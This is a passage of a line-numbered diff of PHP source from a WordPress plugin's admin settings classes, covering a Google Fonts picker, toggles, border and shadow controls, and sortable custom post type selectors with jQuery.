<option value="Anonymous Pro" style="font-family: Anonymous Pro,Anonymous Pro;"> Anonymous Pro</option>
|
641 |
+
<option value="Arimo" style="font-family: Arimo,Arimo;"> Arimo</option>
|
642 |
+
<option value="Arvo" style="font-family: Arvo,Arvo;"> Arvo</option>
|
643 |
+
<option value="Bentham" style="font-family: Bentham,Bentham;"> Bentham</option>
|
644 |
+
<option value="Buda" style="font-family: Buda,Buda;"> Buda</option>
|
645 |
+
<option value="Cabin" style="font-family: Cabin,Cabin;"> Cabin</option>
|
646 |
+
<option value="Calligraffitti" style="font-family: Calligraffitti,Calligraffitti;"> Calligraffitti</option>
|
647 |
+
<option value="Cantarell" style="font-family: Cantarell,Cantarell;"> Cantarell</option>
|
648 |
+
<option value="Cardo" style="font-family: Cardo,Cardo;"> Cardo</option>
|
649 |
+
<option value="Cherry Cream Soda" style="font-family: Cherry Cream Soda,Cherry Cream Soda;"> Cherry Cream Soda</option>
|
650 |
+
<option value="Chewy" style="font-family: Chewy,Chewy;"> Chewy</option>
|
651 |
+
<option value="Coda" style="font-family: Coda,Coda;"> Coda</option>
|
652 |
+
<option value="Coming Soon" style="font-family: Coming Soon,Coming Soon;"> Coming Soon</option>
|
653 |
+
<option value="Copse" style="font-family: Copse,Copse;"> Copse</option>
|
654 |
+
<option value="Corben" style="font-family: Corben,Corben;"> Corben</option>
|
655 |
+
<option value="Cousine" style="font-family: Cousine,Cousine;"> Cousine</option>
|
656 |
+
<option value="Covered By Your Grace" style="font-family: Covered By Your Grace,Covered By Your Grace;"> Covered By Your Grace</option>
|
657 |
+
<option value="Crafty Girls" style="font-family: Crafty Girls,Crafty Girls;"> Crafty Girls</option>
|
658 |
+
<option value="Crimson Text" style="font-family: Crimson Text,Crimson Text;"> Crimson Text</option>
|
659 |
+
<option value="Crushed" style="font-family: Crushed,Crushed;"> Crushed</option>
|
660 |
+
<option value="Cuprum" style="font-family: Cuprum,Cuprum;"> Cuprum</option>
|
661 |
+
<option value="Droid Sans" style="font-family: Droid Sans,Droid Sans;"> Droid Sans</option>
|
662 |
+
<option value="Droid Sans Mono" style="font-family: Droid Sans Mono,Droid Sans Mono;"> Droid Sans Mono</option>
|
663 |
+
<option value="Droid Serif" style="font-family: Droid Serif,Droid Serif;"> Droid Serif</option>
|
664 |
+
<option value="Fontdiner Swanky" style="font-family: Fontdiner Swanky,Fontdiner Swanky;"> Fontdiner Swanky</option>
|
665 |
+
<option value="GFS Didot" style="font-family: GFS Didot,GFS Didot;"> GFS Didot</option>
|
666 |
+
<option value="GFS Neohellenic" style="font-family: GFS Neohellenic,GFS Neohellenic;"> GFS Neohellenic</option>
|
667 |
+
<option value="Geo" style="font-family: Geo,Geo;"> Geo</option>
|
668 |
+
<option value="Gruppo" style="font-family: Gruppo,Gruppo;"> Gruppo</option>
|
669 |
+
<option value="Hanuman" style="font-family: Hanuman,Hanuman;"> Hanuman</option>
|
670 |
+
<option value="Homemade Apple" style="font-family: Homemade Apple,Homemade Apple;"> Homemade Apple</option>
|
671 |
+
<option value="IM Fell DW Pica" style="font-family: IM Fell DW Pica,IM Fell DW Pica;"> IM Fell DW Pica</option>
|
672 |
+
<option value="IM Fell DW Pica SC" style="font-family: IM Fell DW Pica SC,IM Fell DW Pica SC;"> IM Fell DW Pica SC</option>
|
673 |
+
<option value="IM Fell Double Pica" style="font-family: IM Fell Double Pica,IM Fell Double Pica;"> IM Fell Double Pica</option>
|
674 |
+
<option value="IM Fell Double Pica SC" style="font-family: IM Fell Double Pica SC,IM Fell Double Pica SC;"> IM Fell Double Pica SC</option>
|
675 |
+
<option value="IM Fell English" style="font-family: IM Fell English,IM Fell English;"> IM Fell English</option>
|
676 |
+
<option value="IM Fell English SC" style="font-family: IM Fell English SC,IM Fell English SC;"> IM Fell English SC</option>
|
677 |
+
<option value="IM Fell French Canon" style="font-family: IM Fell French Canon,IM Fell French Canon;"> IM Fell French Canon</option>
|
678 |
+
<option value="IM Fell French Canon SC" style="font-family: IM Fell French Canon SC,IM Fell French Canon SC;"> IM Fell French Canon SC</option>
|
679 |
+
<option value="IM Fell Great Primer" style="font-family: IM Fell Great Primer,IM Fell Great Primer;"> IM Fell Great Primer</option>
|
680 |
+
<option value="IM Fell Great Primer SC" style="font-family: IM Fell Great Primer SC,IM Fell Great Primer SC;"> IM Fell Great Primer SC</option>
|
681 |
+
<option value="Inconsolata" style="font-family: Inconsolata,Inconsolata;"> Inconsolata</option>
|
682 |
+
<option value="Irish Growler" style="font-family: Irish Growler,Irish Growler;"> Irish Growler</option>
|
683 |
+
<option value="Josefin Sans" style="font-family: Josefin Sans,Josefin Sans;"> Josefin Sans</option>
|
684 |
+
<option value="Josefin Slab" style="font-family: Josefin Slab,Josefin Slab;"> Josefin Slab</option>
|
685 |
+
<option value="Just Another Hand" style="font-family: Just Another Hand,Just Another Hand;"> Just Another Hand</option>
|
686 |
+
<option value="Just Me Again Down Here" style="font-family: Just Me Again Down Here,Just Me Again Down Here;"> Just Me Again Down Here</option>
|
687 |
+
<option value="Kenia" style="font-family: Kenia,Kenia;"> Kenia</option>
|
688 |
+
<option value="Kranky" style="font-family: Kranky,Kranky;"> Kranky</option>
|
689 |
+
<option value="Kristi" style="font-family: Kristi,Kristi;"> Kristi</option>
|
690 |
+
<option value="Lato" style="font-family: Lato,Lato;"> Lato</option>
|
691 |
+
<option value="Lekton" style="font-family: Lekton,Lekton;"> Lekton</option>
|
692 |
+
<option value="Lobster" style="font-family: Lobster,Lobster;"> Lobster</option>
|
693 |
+
<option value="Luckiest Guy" style="font-family: Luckiest Guy,Luckiest Guy;"> Luckiest Guy</option>
|
694 |
+
<option value="Merriweather" style="font-family: Merriweather,Merriweather;"> Merriweather</option>
|
695 |
+
<option value="Molengo" style="font-family: Molengo,Molengo;"> Molengo</option>
|
696 |
+
<option value="Mountains of Christmas" style="font-family: Mountains of Christmas,Mountains of Christmas;"> Mountains of Christmas</option>
|
697 |
+
<option value="Neucha" style="font-family: Neucha,Neucha;"> Neucha</option>
|
698 |
+
<option value="Neuton" style="font-family: Neuton,Neuton;"> Neuton</option>
|
699 |
+
<option value="Nobile" style="font-family: Nobile,Nobile;"> Nobile</option>
|
700 |
+
<option value="OFL Sorts Mill Goudy TT" style="font-family: OFL Sorts Mill Goudy TT,OFL Sorts Mill Goudy TT;"> OFL Sorts Mill Goudy TT</option>
|
701 |
+
<option value="Old Standard TT" style="font-family: Old Standard TT,Old Standard TT;"> Old Standard TT</option>
|
702 |
+
<option value="Orbitron" style="font-family: Orbitron,Orbitron;"> Orbitron</option>
|
703 |
+
<option value="PT Sans" style="font-family: PT Sans,PT Sans;"> PT Sans</option>
|
704 |
+
<option value="PT Sans Caption" style="font-family: PT Sans Caption,PT Sans Caption;"> PT Sans Caption</option>
|
705 |
+
<option value="PT Sans Narrow" style="font-family: PT Sans Narrow,PT Sans Narrow;"> PT Sans Narrow</option>
|
706 |
+
<option value="Permanent Marker" style="font-family: Permanent Marker,Permanent Marker;"> Permanent Marker</option>
|
707 |
+
<option value="Philosopher" style="font-family: Philosopher,Philosopher;"> Philosopher</option>
|
708 |
+
<option value="Puritan" style="font-family: Puritan,Puritan;"> Puritan</option>
|
709 |
+
<option value="Raleway" style="font-family: Raleway,Raleway;"> Raleway</option>
|
710 |
+
<option value="Reenie Beanie" style="font-family: Reenie Beanie,Reenie Beanie;"> Reenie Beanie</option>
|
711 |
+
<option value="Rock Salt" style="font-family: Rock Salt,Rock Salt;"> Rock Salt</option>
|
712 |
+
<option value="Schoolbell" style="font-family: Schoolbell,Schoolbell;"> Schoolbell</option>
|
713 |
+
<option value="Slackey" style="font-family: Slackey,Slackey;"> Slackey</option>
|
714 |
+
<option value="Sniglet" style="font-family: Sniglet,Sniglet;"> Sniglet</option>
|
715 |
+
<option value="Sunshiney" style="font-family: Sunshiney,Sunshiney;"> Sunshiney</option>
|
716 |
+
<option value="Syncopate" style="font-family: Syncopate,Syncopate;"> Syncopate</option>
|
717 |
+
<option value="Tangerine" style="font-family: Tangerine,Tangerine;"> Tangerine</option>
|
718 |
+
<option value="Tinos" style="font-family: Tinos,Tinos;"> Tinos</option>
|
719 |
+
<option value="Ubuntu" style="font-family: Ubuntu,Ubuntu;"> Ubuntu</option>
|
720 |
+
<option value="UnifrakturCook" style="font-family: UnifrakturCook,UnifrakturCook;"> UnifrakturCook</option>
|
721 |
+
<option value="UnifrakturMaguntia" style="font-family: UnifrakturMaguntia,UnifrakturMaguntia;"> UnifrakturMaguntia</option>
|
722 |
+
<option value="Unkempt" style="font-family: Unkempt,Unkempt;"> Unkempt</option>
|
723 |
+
<option value="Vibur" style="font-family: Vibur,Vibur;"> Vibur</option>
|
724 |
+
<option value="Vollkorn" style="font-family: Vollkorn,Vollkorn;"> Vollkorn</option>
|
725 |
+
<option value="Walter Turncoat" style="font-family: Walter Turncoat,Walter Turncoat;"> Walter Turncoat</option>
|
726 |
+
<option value="Yanone Kaffeesatz" style="font-family: Yanone Kaffeesatz,Yanone Kaffeesatz;"> Yanone Kaffeesatz</option>
|
727 |
+
';
|
728 |
+
$options = explode("<option", $options);
|
729 |
+
unset($options[0]);
|
730 |
+
foreach ($options as $option) {
|
731 |
+
if (strpos(stripslashes($option), '"' . stripslashes($this->font) . '"') !== false) {
|
732 |
+
echo "<option selected='selected' " . $option;
|
733 |
+
} else {
|
734 |
+
echo "<option " . $option;
|
735 |
+
}
|
736 |
+
}
|
737 |
+
if ($this->weight == "")
|
738 |
+
$this->weight = "normal";
|
739 |
+
echo "</select><br><br>";
|
740 |
+
echo "<input type='hidden' value=\"" . $this->data . "\" name='" . $this->name . "'>";
|
741 |
+
echo "<input class='wpdreans-fontweight' name='" .self::$_instancenumber . "_font-weight' type='radio' value='normal' " . (($this->weight == 'normal') ? 'checked' : '') . ">Normal</input>";
|
742 |
+
echo "<input class='wpdreans-fontweight' name='" .self::$_instancenumber . "_font-weight' type='radio' value='bold' " . (($this->weight == 'bold') ? 'checked' : '') . ">Bold</input><br><br>";
|
743 |
+
new wpdreamsColorPickerDummy( self::$_instancenumber . "_color", "", (isset($this->color) ? $this->color : "#000000"));
|
744 |
+
echo "<br />" . $this->label . " size (ex.:10em, 10px or 110%): ";
|
745 |
+
echo "<input type='text' class='wpdreams-fontsize' style='width:70px;' name='" . self::$_instancenumber . "_size' value='" . $this->size . "' />";
|
746 |
+
echo " Line height: <input type='text' class='wpdreams-lineheight' style='width:70px;' name='" . self::$_instancenumber . "_lineheight' value='" . $this->lineheight . "' />";
|
747 |
+
new wpdreamsInfo("You can enter the font size in pixels, ems or in percents. For example: 10px or 1.3em or 120%");
|
748 |
+
echo "
|
749 |
+
<div class='triggerer'></div>
|
750 |
+
</fieldset>
|
751 |
+
</div>";
|
752 |
+
}
|
753 |
+
final function getData() {
|
754 |
+
return $this->data;
|
755 |
+
}
|
756 |
+
final function getScript() {
|
757 |
+
if (strpos($this->font, "'"))
|
758 |
+
return;
|
759 |
+
$font = str_replace(" ", "+", trim($this->font));
|
760 |
+
ob_start();
|
761 |
+
?>
|
762 |
+
<style>
|
763 |
+
@import url(http://fonts.googleapis.com/css?family=<?php echo $font; ?>:300|<?php echo $font; ?>:400|<?php echo $font; ?>:700);
|
764 |
+
</style>
|
765 |
+
<?php
|
766 |
+
$out = ob_get_contents();
|
767 |
+
ob_end_clean();
|
768 |
+
return $out;
|
769 |
+
}
|
770 |
+
final function getImport() {
|
771 |
+
if (strpos($this->font, "'"))
|
772 |
+
return;
|
773 |
+
$font = str_replace(" ", "+", trim($this->font));
|
774 |
+
ob_start();
|
775 |
+
?>
|
776 |
+
@import url(http://fonts.googleapis.com/css?family=<?php echo $font; ?>:300|<?php echo $font; ?>:400|<?php echo $font; ?>:700);
|
777 |
+
<?php
|
778 |
+
$out = ob_get_contents();
|
779 |
+
ob_end_clean();
|
780 |
+
return $out;
|
781 |
+
}
|
782 |
+
}
|
783 |
+
}
|
784 |
+
|
785 |
+
if (!class_exists("wpdreamsOnOff")) {
|
786 |
+
class wpdreamsOnOff extends wpdreamsType {
|
787 |
+
function getType() {
|
788 |
+
parent::getType();
|
789 |
+
echo "<div class='wpdreamsOnOff'>";
|
790 |
+
echo "<label for='wpdreamstext_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
791 |
+
echo "<a class='wpdreamsonoff" . (($this->data == 1) ? " on" : " off") . "' id='wpdreamsonoff_" . self::$_instancenumber . "' name='" . $this->name . "_onoff'>" . (($this->data == 1) ? "ON" : "OFF") . "</a>";
|
792 |
+
echo "<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
793 |
+
echo "<div class='triggerer'></div>
|
794 |
+
</div>";
|
795 |
+
}
|
796 |
+
}
|
797 |
+
}
|
798 |
+
|
799 |
+
|
800 |
+
if (!class_exists("wpdreamsYesNo")) {
|
801 |
+
class wpdreamsYesNo extends wpdreamsType {
|
802 |
+
function getType() {
|
803 |
+
parent::getType();
|
804 |
+
echo "<div class='wpdreamsYesNo'>";
|
805 |
+
echo "<label for='wpdreamstext_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
806 |
+
echo "<a class='wpdreamsyesno" . (($this->data == 1) ? " yes" : " no") . "' id='wpdreamsyesno_" . self::$_instancenumber . "' name='" . $this->name . "_yesno'>" . (($this->data == 1) ? "YES" : "NO") . "</a>";
|
807 |
+
echo "<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
808 |
+
echo "<div class='triggerer'></div>
|
809 |
+
</div>";
|
810 |
+
}
|
811 |
+
}
|
812 |
+
}
|
813 |
+
|
814 |
+
if (!class_exists("wpdreamsImageRadio")) {
|
815 |
+
class wpdreamsImageRadio extends wpdreamsType {
|
816 |
+
function getType() {
|
817 |
+
parent::getType();
|
818 |
+
$this->processData();
|
819 |
+
echo "<div class='wpdreamsImageRadio'>";
|
820 |
+
echo "<span class='radioimage'>" . $this->label . "</span>";
|
821 |
+
|
822 |
+
foreach ($this->selects as $radio) {
|
823 |
+
$radio = trim($radio);
|
824 |
+
echo "
|
825 |
+
<img src='".plugins_url().$radio."' class='radioimage".(($radio==trim($this->selected))?' selected':'')."'/>
|
826 |
+
";
|
827 |
+
}
|
828 |
+
echo "<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
829 |
+
echo "<div class='triggerer'></div>
|
830 |
+
</div>";
|
831 |
+
}
|
832 |
+
function processData() {
|
833 |
+
//$this->data = str_replace("\n","",$this->data);
|
834 |
+
$_temp = explode("||", $this->data);
|
835 |
+
$this->selects = explode(";", $_temp[0]);
|
836 |
+
$this->selected = trim($_temp[1]);
|
837 |
+
}
|
838 |
+
final function getData() {
|
839 |
+
return $this->data;
|
840 |
+
}
|
841 |
+
final function getSelected() {
|
842 |
+
return $this->selected;
|
843 |
+
}
|
844 |
+
}
|
845 |
+
}
|
846 |
+
|
847 |
+
|
848 |
+
if (!class_exists("wpdreamsBoxShadow")) {
|
849 |
+
class wpdreamsBoxShadow extends wpdreamsType {
|
850 |
+
function getType() {
|
851 |
+
parent::getType();
|
852 |
+
$this->processData();
|
853 |
+
echo "
|
854 |
+
<div class='wpdreamsBoxShadow'>
|
855 |
+
<fieldset>
|
856 |
+
<legend>" . $this->label . "</legend>";
|
857 |
+
echo "
|
858 |
+
<label>Inset</label><select class='smaller' name='_xx_inset_xx_'>
|
859 |
+
<option value='' ".(($this->inset=='')?'selected="selected"':'').">None</option>
|
860 |
+
<option value='inset' ".(($this->inset=='inset')?'selected="selected"':'').">Inset</option>
|
861 |
+
</select><br><br>
|
862 |
+
<label>Vertical offset</label><input type='text' class='twodigit' name='_xx_hlength_xx_' value='".$this->hlength."' />px
|
863 |
+
<label>Horizontal offset</label><input type='text' class='twodigit' name='_xx_vlength_xx_' value='".$this->vlength."' />px
|
864 |
+
<label>Blur radius</label><input type='text' class='twodigit' name='_xx_blurradius_xx_' value='".$this->blurradius."' />px
|
865 |
+
<label>Spread</label><input type='text' class='twodigit' name='_xx_spread_xx_' value='".$this->spread."' />px<br><br>
|
866 |
+
";
|
867 |
+
new wpdreamsColorPickerDummy("_xx_color_xx_", "Shadow color", (isset($this->color) ? $this->color : "#000000"));
|
868 |
+
echo "
|
869 |
+
<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>
|
870 |
+
<div class='triggerer'></div>
|
871 |
+
</fieldset>
|
872 |
+
</div>";
|
873 |
+
}
|
874 |
+
function processData() {
|
875 |
+
$this->data = str_replace("\n", "", $this->data);
|
876 |
+
preg_match("/box-shadow:(.*?)px (.*?)px (.*?)px (.*?)px (.*?) (.*?);/", $this->data, $matches);
|
877 |
+
$this->inset = $matches[6];
|
878 |
+
$this->hlength = $matches[1];
|
879 |
+
$this->vlength = $matches[2];
|
880 |
+
$this->blurradius = $matches[3];
|
881 |
+
$this->spread = $matches[4];
|
882 |
+
$this->color = $matches[5];
|
883 |
+
}
|
884 |
+
final function getData() {
|
885 |
+
return $this->data;
|
886 |
+
}
|
887 |
+
final function getCss() {
|
888 |
+
return $this->css;
|
889 |
+
}
|
890 |
+
}
|
891 |
+
}
|
892 |
+
|
893 |
+
|
894 |
+
if (!class_exists("wpdreamsBorder")) {
|
895 |
+
class wpdreamsBorder extends wpdreamsType {
|
896 |
+
function getType() {
|
897 |
+
parent::getType();
|
898 |
+
$this->processData();
|
899 |
+
echo "
|
900 |
+
<div class='wpdreamsBorder'>
|
901 |
+
<fieldset>
|
902 |
+
<legend>" . $this->label . "</legend>";
|
903 |
+
echo "
|
904 |
+
<label>Border Style</label><select class='smaller' name='_xx_style_xx_'>
|
905 |
+
<option value='none' ".(($this->style=='none')?'selected="selected"':'').">None</option>
|
906 |
+
<option value='hidden' ".(($this->style=='hidden')?'selected="selected"':'').">Hidden</option>
|
907 |
+
<option value='dotted' ".(($this->style=='dotted')?'selected="selected"':'').">Dotted</option>
|
908 |
+
<option value='dashed' ".(($this->style=='dashed')?'selected="selected"':'').">Dashed</option>
|
909 |
+
<option value='solid' ".(($this->style=='solid')?'selected="selected"':'').">Solid</option>
|
910 |
+
<option value='double' ".(($this->style=='double')?'selected="selected"':'').">Double</option>
|
911 |
+
<option value='groove' ".(($this->style=='groove')?'selected="selected"':'').">Groove</option>
|
912 |
+
<option value='groove' ".(($this->style=='groove')?'selected="selected"':'').">Ridge</option>
|
913 |
+
<option value='inset' ".(($this->style=='inset')?'selected="selected"':'').">Inset</option>
|
914 |
+
<option value='outset' ".(($this->style=='outset')?'selected="selected"':'').">Outset</option>
|
915 |
+
</select><br><br>
|
916 |
+
<label>Border Width</label><input type='text' class='twodigit' name='_xx_width_xx_' value='".$this->width."' />px
|
917 |
+
<br><br>";
|
918 |
+
new wpdreamsColorPickerDummy("_xx_color_xx_", "Border color", (isset($this->color) ? $this->color : "#000000"));
|
919 |
+
echo "<span style='margin-right:550px;color:#222;'>Border Radius Options:</span><br><br>
|
920 |
+
<label>Top-Left</label><input type='text' class='twodigit' name='_xx_topleft_xx_' value='".$this->topleft."' />px
|
921 |
+
<label>Top-Right</label><input type='text' class='twodigit' name='_xx_topright_xx_' value='".$this->topright."' />px
|
922 |
+
<label>Bottom-Right</label><input type='text' class='twodigit' name='_xx_bottomright_xx_' value='".$this->bottomright."' />px
|
923 |
+
<label>Bottom-Left</label><input type='text' class='twodigit' name='_xx_bottomleft_xx_' value='".$this->bottomleft."' />px
|
924 |
+
";
|
925 |
+
|
926 |
+
echo "
|
927 |
+
<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>
|
928 |
+
<div class='triggerer'></div>
|
929 |
+
</fieldset>
|
930 |
+
</div>";
|
931 |
+
}
|
932 |
+
function processData() {
|
933 |
+
$this->data = str_replace("\n", "", $this->data);
|
934 |
+
|
935 |
+
preg_match("/border-radius:(.*?)px(.*?)px(.*?)px(.*?)px;/", $this->data, $matches);
|
936 |
+
$this->topleft = $matches[1];
|
937 |
+
$this->topright = $matches[2];
|
938 |
+
$this->bottomright = $matches[3];
|
939 |
+
$this->bottomleft = $matches[4];
|
940 |
+
|
941 |
+
preg_match("/border:(.*?)px (.*?) (.*?);/", $this->data, $matches);
|
942 |
+
$this->width = $matches[1];
|
943 |
+
$this->style = $matches[2];
|
944 |
+
$this->color = $matches[3];
|
945 |
+
|
946 |
+
}
|
947 |
+
final function getData() {
|
948 |
+
return $this->data;
|
949 |
+
}
|
950 |
+
final function getCss() {
|
951 |
+
return $this->css;
|
952 |
+
}
|
953 |
+
}
|
954 |
+
}
|
955 |
+
|
956 |
+
|
957 |
+
if (!class_exists("wpdreamsBorderRadius")) {
|
958 |
+
class wpdreamsBorderRadius extends wpdreamsType {
|
959 |
+
function getType() {
|
960 |
+
parent::getType();
|
961 |
+
$this->processData();
|
962 |
+
echo "
|
963 |
+
<div class='wpdreamsBorderRadius'>
|
964 |
+
<fieldset>
|
965 |
+
<legend>" . $this->label . "</legend>";
|
966 |
+
echo "
|
967 |
+
<label>Top Left</label><input type='text' class='twodigit' name='topleft' value='".$this->topleft."' />px
|
968 |
+
<label>Top Right</label><input type='text' class='twodigit' name='topright' value='".$this->topright."' />px
|
969 |
+
<label>Bottom Right</label><input type='text' class='twodigit' name='bottomright' value='".$this->bottomright."' />px
|
970 |
+
<label>Bottom Left</label><input type='text' class='twodigit' name='bottomleft' value='".$this->bottomleft."' />px<br><br>
|
971 |
+
";
|
972 |
+
echo "
|
973 |
+
<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>
|
974 |
+
<div class='triggerer'></div>
|
975 |
+
</fieldset>
|
976 |
+
</div>";
|
977 |
+
}
|
978 |
+
function processData() {
|
979 |
+
$this->data = str_replace("\n", "", $this->data);
|
980 |
+
preg_match("/border-radius:(.*?)px(.*?)px(.*?)px(.*?)px;/", $this->data, $matches);
|
981 |
+
$this->topleft = $matches[1];
|
982 |
+
$this->topright = $matches[2];
|
983 |
+
$this->bottomright = $matches[3];
|
984 |
+
$this->bottomleft = $matches[4];
|
985 |
+
//$this->css = "border-radius:".$this->topleft."px ".$this->topright."px ".$this->bottomright."px ".$this->bottomleft."px;";
|
986 |
+
}
|
987 |
+
final function getData() {
|
988 |
+
return $this->data;
|
989 |
+
}
|
990 |
+
/*final function getCss() {
|
991 |
+
return $this->css;
|
992 |
+
}*/
|
993 |
+
}
|
994 |
+
}
|
995 |
+
|
996 |
+
if (!class_exists("wpdreamsCustomPostTypes")) {
|
997 |
+
class wpdreamsCustomPostTypes extends wpdreamsType {
|
998 |
+
function getType() {
|
999 |
+
parent::getType();
|
1000 |
+
$this->processData();
|
1001 |
+
$this->types = get_post_types(array(
|
1002 |
+
'_builtin'=>false
|
1003 |
+
));
|
1004 |
+
echo "
|
1005 |
+
<div class='wpdreamsCustomPostTypes'>
|
1006 |
+
<fieldset>
|
1007 |
+
<legend>" . $this->label . "</legend>";
|
1008 |
+
echo '<div class="sortablecontainer">Available post types<ul id="sortable'.self::$_instancenumber.'" class="connectedSortable">';
|
1009 |
+
if ($this->types!=null && is_array($this->types)) {
|
1010 |
+
foreach($this->types as $k=>$v) {
|
1011 |
+
if ($this->selected==null || !in_array($v, $this->selected)) {
|
1012 |
+
echo '<li class="ui-state-default">'.$k.'</li>';
|
1013 |
+
}
|
1014 |
+
}
|
1015 |
+
}
|
1016 |
+
echo "</ul></div>";
|
1017 |
+
echo '<div class="sortablecontainer">Drag here the post types you want to use!<ul id="sortable_conn'.self::$_instancenumber.'" class="connectedSortable">';
|
1018 |
+
if ($this->selected!=null && is_array($this->selected)) {
|
1019 |
+
foreach($this->selected as $k=>$v) {
|
1020 |
+
echo '<li class="ui-state-default">'.$v.'</li>';
|
1021 |
+
}
|
1022 |
+
}
|
1023 |
+
echo "</ul></div>";
|
1024 |
+
echo "
|
1025 |
+
<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
1026 |
+
?>
|
1027 |
+
<script>
|
1028 |
+
(function($) {
|
1029 |
+
$(document).ready(function() {
|
1030 |
+
$( "#sortable<?php echo self::$_instancenumber ?>, #sortable_conn<?php echo self::$_instancenumber ?>" ).sortable({
|
1031 |
+
connectWith: ".connectedSortable"
|
1032 |
+
}, {
|
1033 |
+
update: function(event, ui) {
|
1034 |
+
parent = $(ui.item).parent();
|
1035 |
+
while(!parent.hasClass('wpdreamsCustomPostTypes')) {
|
1036 |
+
parent=$(parent).parent();
|
1037 |
+
}
|
1038 |
+
var items = $('ul[id*=sortable_conn] li',parent);
|
1039 |
+
var hidden = $('input[type=hidden]', parent);
|
1040 |
+
console.log(items, hidden);
|
1041 |
+
var val = "";
|
1042 |
+
items.each(function(){
|
1043 |
+
val+= "|"+$(this).html();
|
1044 |
+
});
|
1045 |
+
val = val.substring(1);
|
1046 |
+
hidden.val(val);
|
1047 |
+
}
|
1048 |
+
}).disableSelection();
|
1049 |
+
});
|
1050 |
+
}(jQuery));
|
1051 |
+
</script>
|
1052 |
+
<?php
|
1053 |
+
echo "
|
1054 |
+
</fieldset>
|
1055 |
+
</div>";
|
1056 |
+
}
|
1057 |
+
function processData() {
|
1058 |
+
$this->data = str_replace("\n", "", $this->data);
|
1059 |
+
if ($this->data!="")
|
1060 |
+
$this->selected = explode("|", $this->data);
|
1061 |
+
else
|
1062 |
+
$this->selected = null;
|
1063 |
+
//$this->css = "border-radius:".$this->topleft."px ".$this->topright."px ".$this->bottomright."px ".$this->bottomleft."px;";
|
1064 |
+
}
|
1065 |
+
final function getData() {
|
1066 |
+
return $this->data;
|
1067 |
+
}
|
1068 |
+
final function getSelected() {
|
1069 |
+
return $this->selected;
|
1070 |
+
}
|
1071 |
+
}
|
1072 |
+
}
|
1073 |
+
|
1074 |
+
if (!class_exists("wpdreamsCustomPostTypesEditable")) {
|
1075 |
+
class wpdreamsCustomPostTypesEditable extends wpdreamsType {
|
1076 |
+
function getType() {
|
1077 |
+
parent::getType();
|
1078 |
+
$this->processData();
|
1079 |
+
$this->types = get_post_types(array(
|
1080 |
+
'_builtin'=>false
|
1081 |
+
));
|
1082 |
+
echo "
|
1083 |
+
<div class='wpdreamsCustomPostTypesEditable'>
|
1084 |
+
<fieldset>
|
1085 |
+
<legend>" . $this->label . "</legend>";
|
1086 |
+
echo '<div class="sortablecontainer">Available post types<ul id="sortable'.self::$_instancenumber.'" class="connectedSortable">';
|
1087 |
+
if ($this->types!=null && is_array($this->types)) {
|
1088 |
+
foreach($this->types as $k=>$v) {
|
1089 |
+
if ($this->selected==null || !in_array_r($v, $this->selected)) {
|
1090 |
+
echo '<li class="ui-state-default" style="background: #ddd;">
|
1091 |
+
<span>'.$k.'</span><br>
|
1092 |
+
<input type="text" value="'.$k.'"/>
|
1093 |
+
</li>';
|
1094 |
+
}
|
1095 |
+
}
|
1096 |
+
}
|
1097 |
+
echo "</ul></div>";
|
1098 |
+
echo '<div class="sortablecontainer">Drag here the post types you want to use!<ul id="sortable_conn'.self::$_instancenumber.'" class="connectedSortable">';
|
1099 |
+
if ($this->selected!=null && is_array($this->selected)) {
|
1100 |
+
foreach($this->selected as $k=>$v) {
|
1101 |
+
echo '<li class="ui-state-default" style="background: #ddd;">
|
1102 |
+
<span>'.$v[0].'</span><br>
|
1103 |
+
<input type="text" value="'.$v[1].'"/>
|
1104 |
+
</li>';
|
1105 |
+
}
|
1106 |
+
}
|
1107 |
+
echo "</ul></div>";
|
1108 |
+
echo "
|
1109 |
+
<input type='hidden' value='" . $this->data . "' name='" . $this->name . "'>";
|
1110 |
+
?>
|
1111 |
+
<script>
|
1112 |
+
(function($) {
|
1113 |
+
$(document).ready(function() {
|
1114 |
+
$("#sortable_conn<?php echo self::$_instancenumber ?> li input" ).keyup(function() {
|
1115 |
+
parent = $(this).parent();
|
1116 |
+
while(!parent.hasClass('wpdreamsCustomPostTypesEditable')) {
|
1117 |
+
parent=$(parent).parent();
|
1118 |
+
}
|
1119 |
+
var items = $('ul[id*=sortable_conn] li',parent);
|
1120 |
+
var hidden = $('input[type=hidden]', parent);
|
1121 |
+
var val = "";
|
1122 |
+
console.log(hidden, items);
|
1123 |
+
items.each(function(){
|
1124 |
+
val+= "|"+$('span', this).html()+";"+$('input', this).val();
|
1125 |
+
});
|
1126 |
+
val = val.substring(1);
|
1127 |
+
hidden.val(val);
|
1128 |
+
});
|
1129 |
+
$( "#sortable<?php echo self::$_instancenumber ?>, #sortable_conn<?php echo self::$_instancenumber ?>" ).sortable({
|
1130 |
+
connectWith: ".connectedSortable"
|
1131 |
+
}, {
|
1132 |
+
update: function(event, ui) {
|
1133 |
+
$("#sortable_conn<?php echo self::$_instancenumber ?> li input" ).keyup(function() {
|
1134 |
+
parent = $(this).parent();
|
1135 |
+
while(!parent.hasClass('wpdreamsCustomPostTypesEditable')) {
|
1136 |
+
parent=$(parent).parent();
|
1137 |
+
}
|
1138 |
+
var items = $('ul[id*=sortable_conn] li',parent);
|
1139 |
+
var hidden = $('input[type=hidden]', parent);
|
1140 |
+
var val = "";
|
1141 |
+
console.log(hidden, items);
|
1142 |
+
items.each(function(){
|
1143 |
+
val+= "|"+$('span', this).html()+";"+$('input', this).val();
|
1144 |
+
});
|
1145 |
+
val = val.substring(1);
|
1146 |
+
hidden.val(val);
|
1147 |
+
});
|
1148 |
+
$("#sortable_conn<?php echo self::$_instancenumber ?> li input" ).keyup();
|
1149 |
+
}
|
1150 |
+
});
|
1151 |
+
});
|
1152 |
+
|
1153 |
+
}(jQuery));
|
1154 |
+
</script>
|
1155 |
+
<?php
|
1156 |
+
echo "
|
1157 |
+
</fieldset>
|
1158 |
+
</div>";
|
1159 |
+
}
|
1160 |
+
function processData() {
|
1161 |
+
$this->data = str_replace("\n", "", $this->data);
|
1162 |
+
if ($this->data!="") {
|
1163 |
+
$this->_t = explode("|", $this->data);
|
1164 |
+
foreach($this->_t as $k=>$v) {
|
1165 |
+
